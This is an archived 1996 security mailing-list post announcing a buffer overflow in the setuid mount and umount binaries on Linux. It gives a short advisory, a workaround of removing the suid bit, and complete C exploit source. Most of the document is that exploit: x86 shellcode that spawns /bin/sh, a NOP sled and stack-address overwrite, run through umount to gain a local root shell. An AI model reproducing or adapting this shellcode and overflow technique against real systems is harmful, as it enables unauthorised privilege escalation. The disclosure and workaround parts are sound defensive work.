|
Vulnrability in all known Linux distributions bloodmask (bloodmask@mymail.com) Tue, 13 Aug 1996 07:04:25 +0200 Greetings, Well folks, After all the other security issues in Linux, I can't say I'm really that shocked about this one, anyway, read the officail covin release. After finding this one, we at covin decided it's time to put and end to this issue, and we've begun scanning all of Linux's suid binaries for other hints of these hidden "features", Results will be released soon. The reason we are also releasing the exploit, an act which may seem highly inresponsable, is due to previous expieriance that making the exploit widely available, ussually speeds up the proccess of patching up stupid vulnerabilities like these. BTW, This is kind of out of topic, but I figure, there's nothing wrong with killing two birds with one stone... Ijust noticed when installing the latest version of the shadow suite, taken from sunsite, that it "unpatched" the lib enviorment vulnerability on my system. I haven't had the time to determine *HOW* it exposed my system, but it would be wise to check up on this matter. --------------2F3F790C537451604439D8BF Content-Type: text/plain; charset=us-ascii; name="cvnmount.exploit" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="cvnmount.exploit" Covin Security Releases: (mount bufferoverflow exploit v1.0) Tested operated systems: All current distributions of Linux Affect: Local users on systems affected can gain overflow mounts syntax buffer and execute a shell by overwriting the stack. Affected binaries: (/bin/mount and /bin/umount) Workaround: On all current distributions of Linux remove suid bit of /bin/mount and /bin/umount. [chmod -s /bin/mount;chmod -s /bin/umount] Remarks: For gods sake, how many more times are we gonna see this kind of problem? It's been with Linux since it's very beggining, and it's so easy to exploit. Similiar buffer overflow vulnerabilities have been found in Linux distributions many times before, splitvt, dip, just to name a few examples. Any remarks, notes or other forms of feedback may be redirected to: bloodmask@mymail.com <------------------------------[ Cut here ]----------------------------------> /* Mount Exploit for Linux, Jul 30 1996 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````""::::::::: :::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`:::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ :::::: :::::::...........:::...........:::...........::.......:......:.......:::::: :::::::::::::::::::::::::::::::::::::::::::::::;:::::::::::::::::::::::::::: Discovered and Coded by Bloodmask & Vio Covin Security 1996 */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <sys/stat.h> #define PATH_MOUNT "/bin/umount" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 u_long get_esp() { __asm__("movl %esp, %eax"); } main(int argc, char **argv) { u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; (void)alarm((u_int)0); printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n"); execl(PATH_MOUNT, "mount", buff, NULL); }